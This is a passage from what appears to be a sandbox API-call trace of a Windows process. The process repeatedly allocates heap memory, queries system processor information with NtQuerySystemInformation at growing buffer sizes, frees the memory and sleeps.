hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.362] Sleep (dwMilliseconds=0x110) [0185.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.436] Sleep (dwMilliseconds=0x110) [0185.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.487] Sleep (dwMilliseconds=0x110) [0185.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.522] Sleep (dwMilliseconds=0x110) [0185.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.585] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.587] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.597] Sleep (dwMilliseconds=0x110) [0185.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.616] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.617] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.617] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.618] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.618] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.618] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.619] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.621] Sleep (dwMilliseconds=0x110) [0185.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.644] Sleep (dwMilliseconds=0x110) [0185.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.698] Sleep (dwMilliseconds=0x110) [0185.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.821] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.821] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.824] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.824] Sleep (dwMilliseconds=0x110) [0185.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.992] Sleep (dwMilliseconds=0x110) [0186.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.043] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.044] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.047] Sleep (dwMilliseconds=0x110) [0186.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.115] Sleep (dwMilliseconds=0x110) [0186.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.178] Sleep (dwMilliseconds=0x110) [0186.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.237] Sleep (dwMilliseconds=0x110) [0186.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 